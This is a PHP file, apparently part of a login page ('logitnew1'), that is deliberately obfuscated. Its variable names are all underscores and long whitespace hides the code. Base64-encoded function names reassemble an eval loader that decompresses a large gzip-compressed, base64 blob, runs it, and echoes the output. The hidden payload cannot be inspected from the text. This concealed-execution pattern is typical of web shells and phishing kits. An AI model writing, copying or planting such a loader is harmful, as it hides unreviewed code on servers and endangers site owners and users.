<?php 
        $__='printf';$_='Loading logitnew1_php_';
        



























































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































                                                                                                                                                                                                                     $________;
